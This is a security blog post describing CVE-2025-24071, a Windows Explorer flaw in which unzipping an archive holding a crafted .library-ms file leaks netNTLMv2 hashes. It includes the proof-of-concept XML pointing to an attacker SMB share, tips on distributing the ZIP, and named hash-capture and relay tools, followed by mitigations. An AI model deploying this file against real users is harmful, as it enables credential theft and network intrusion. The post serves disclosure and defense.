CVE-2025-24071 - Filter netNTLMv2 Credentials with a simple ZIP
In this blog post, a proof-of-concept (PoC) is presented that demonstrates how a malicious .library-ms
file can be used to capture netNTLMv2 credentials without the need for the victim to interact with the file. Simply unzipping the file is enough to trigger the vulnerability.
Vulnerability Description
Vulnerability CVE-2025-24071 is a critical flaw in Windows Explorer, the default file manager of the Windows operating system. This vulnerability arises from insecure behaviour in the handling of compressed (ZIP) files containing a Windows library file with a .library-ms extension. When a user unzips a malicious ZIP file, Windows Explorer automatically processes the embedded .library-ms file, which triggers a Server Message Block (SMB) connection to a remote server controlled by an attacker.
The most concerning aspect of this vulnerability is that it does not require any user interaction (e.g. clicking on the file), as the malicious action is executed in the background during decompression. As a result, the victim’s system sends the authentication credentials in netNTLMv2 format to the attacker, which could allow the attacker to perform an authentication relay attack (NTLM Relay) or attempt to decrypt the credentials using brute-force techniques.
Potential impact:
-
Credential theft: An attacker could capture NTLMv2 hashes and, in environments with weak password policies, crack them offline.
-
Lateral movement on corporate networks: If the affected user has privileges on an internal network, the attacker could escalate access.
-
Remote Code Execution (RCE): In combination with other vulnerabilities, RCE could be achieved.
Proof of Concept (PoC)
1. Preparation of the Malicious File
To exploit this vulnerability, we must first create a .library-ms
file with the following malicious XML content:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\192.168.0.1\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
This XML file contains a reference to a remote SMB resource (\\ATTACKER-IP\shared
) that the system will automatically try to contact when the file is processed by Windows Explorer. We then compress this file in ZIP format for distribution.
Distribution and Execution
The attack vector is surprisingly simple: the attacker distributes the ZIP file to the victim via any means (email, messaging, download sites, etc.). What is critical about this vulnerability is that it does not require the user to open the malicious file. By simply unzipping the ZIP, Windows Explorer automatically processes the contained .library-ms
file, attempting to establish an SMB connection to the server controlled by the attacker.
Credential Capture
On the attacker’s server, an SMB listener is configured using tools such as responder
, ntlmrelayx
or Inveigh
to intercept and log the netNTLMv2 hashes sent by the victim’s system during the authentication attempt. These hashes can subsequently be:
- Subjected to brute-force attacks to recover the password in clear text.
- Used in NTLM Relay attacks to escalate privileges or move laterally in the network
- exploited to establish authenticated sessions on systems that accept this type of authentication
Mitigation
To protect systems against the vulnerability CVE-2025-24071, the following measures are recommended:
-
Install security updates: Immediately apply the security patches released by Microsoft for this specific vulnerability.
-
Configure group policies:
- Disable SMB outbound in corporate environments where possible.
- Implement firewall rules that block unauthorised outbound SMB connections.
-
Good security practices:
- Avoid unzipping ZIP files from untrusted sources.
- Use up-to-date anti-virus solutions that can detect these types of threats
- Consider using isolated environments to examine suspicious files.
-
Network monitoring: Implement intrusion detection systems capable of identifying attempts to exploit this vulnerability.
Microsoft has classified this vulnerability as critical and recommends updating all affected systems with high priority.
Conclusion
Vulnerability CVE-2025-24071 highlights the importance of keeping systems up-to-date and being cautious when handling compressed files from unknown sources. Exploitation of this vulnerability can occur without the user directly interacting with the exploit.
References
-
Microsoft Security Response Center: CVE-2025-24071 - Official details of the vulnerability and available patches.
-
Proof of Concept by 0x6rss on GitHub - Technical implementation of the PoC demonstrated in this article.
-
MITRE CVE Details: CVE-2025-24071 - Reference information in the official CVE database.
-
NTLM Relay Attacks: A Technical Explanation - Additional resource for understanding the NTLM relay attacks mentioned in the article.